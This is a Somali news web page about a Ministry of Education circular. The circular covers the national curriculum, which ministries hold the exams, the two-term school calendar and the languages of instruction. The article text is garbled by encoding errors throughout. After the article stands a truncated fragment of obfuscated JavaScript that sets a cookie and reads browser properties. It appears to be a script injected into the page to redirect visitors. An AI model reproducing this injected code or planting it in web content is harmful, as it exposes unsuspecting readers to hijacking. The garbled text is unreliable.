Friday, April 17, 2026
HomeWararWasaarada Waxbarashada Soomaaliya Oo Soo Saartay Nidaamka Hirgalinta Waxbarashada Dalka

Wasaarada Waxbarashada Soomaaliya Oo Soo Saartay Nidaamka Hirgalinta Waxbarashada Dalka

Wasiirka Waxbarashada hidaha iyo Tacliinta sare ee Soomaaliya Mudane Cabdulahi Goodax Barre ayaa soo saaray wareegto ku saabsan Nidaamka hirgelinta waxbarashada dalka maadaam dhawaan lagu wado in la furo sannad dugsiyeedka Waxbarsho.

Agaasimaha guud ee Wasaaradda Waxbarashada Xassan Maxamed Cali ayaa saxaafadda u akhriyay wareegtada ka soo baxday Wasaaradda waxaana kamid ah , si looga fogaado jahawareer ku dhaca caruurta Soomaaliyeed ee dhigta dusgiyada waxbarashada dalka islamarkana loo dhaqan geliyo siyaasaddaA�A�iyo manhajka qarankaA�A�ee ay ansixiyeen golaha wasiirada.

Nidaamka hirgelinta waxbarashada dalka

1-Manhajka, dhamaan dugsiyadda waxaa lagu dhigayaa buugagta cusub ee ku saleysan manhajkaA�A�qaran kuwaasoo dhawaan idin soo gaari doona gaar ahaan fasaladaA�A�hoose, koowaad iyo afraad oo ay diyaarisay wasaaradda waxbarashada dalka.

2-Wasaaradaha waxbarashada dowlad goboleedyada dalkaA�A�ayaa qaadi doona imtixaanka shahaadiga eeA�A�fasalka sideedaad ee loogu gudbo dugsiga dhexe, iyaga ayaana bixin doona shahaada loogu gudbayo.

T,ImtixaankaA�A�fasaladka afraadA�A�waxaa qaadayaA�A�wasaaradda waxbarashada hidaha iyo tacliinta sare ee dowladda federaalka.

J,shahaadda dugsiyada sareA�A�waxaa laga qaadan doonaan xafiisyada wasaaradda ee dowlad goboleedyada iyo xafiiska imtixaanaadkaA�A�iyo shahaadooyinka oo ay ka heli doonaan ardeyda gobolka Banaadir.

A�3- Sannad dugsiyeedka xiligiisa.

Dhamaan dugsiyada waxay galayaan labo xili oo kala ah xiliga koowaadA�A�wuxuu bilaaban doonaa bisha Ogosto sabtida ugu horeysay wuxu dhamaan doonaa todobaadka saddexaad ee bishaA�A�December ee sannad walba, sannad dugsiyeedka labaad, wuxuu bilaaban doonaanA�A�Sabtiga ugu horeeyaA�A�ee bisha janaayo wuxuuna dhamaan doona todobaadka ugu dambeeya ee bisha maaj.

4-Afafka lagu baranayo manhajka.

  • Dugsiyada hoose dhexe waxay wax ku baran doonaan afka Soomaaliga.
  • Afka carabiga waxaa maado ahaanA�A�laga bilaabayaaA�A�fasalka koowaad dugsiga hoose.
  • Afka Ingiriiska maado ahaan waxaa lagu bilaabaya fasaladka sadddexaad dugsiyada hoose.
  • Dugsiga sare waxaa wax laguA�A�baranayaan Afafka Soomaaliga, Carabiga iyo ingiriiska iyadoo la raacayo manhajka qaranka.

5- Fasaxyada sannad dugsiyeedka waxaa la raacayaa kalandarka wasaaradda ay soo saartay sannad dugsiyeedka.

  • Dugsiyada sare wuxuu qaadan doonaa 10 maado.
  • Dugsiga dhexe wuxuu qaadanA�A�8 maado.
  • Dugsiga hoose wuxuuqaadan 8 maado.
  • Dugsiga sare wuxuu qaadan doonaa 10 bilood
  • Dugsiga dhexeA�A�wuxuu qaadan doonaa 10 bilood.
  • Dugsiga hoose wuxuu qaadan doonaaA�A�10 bilood.

 
()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe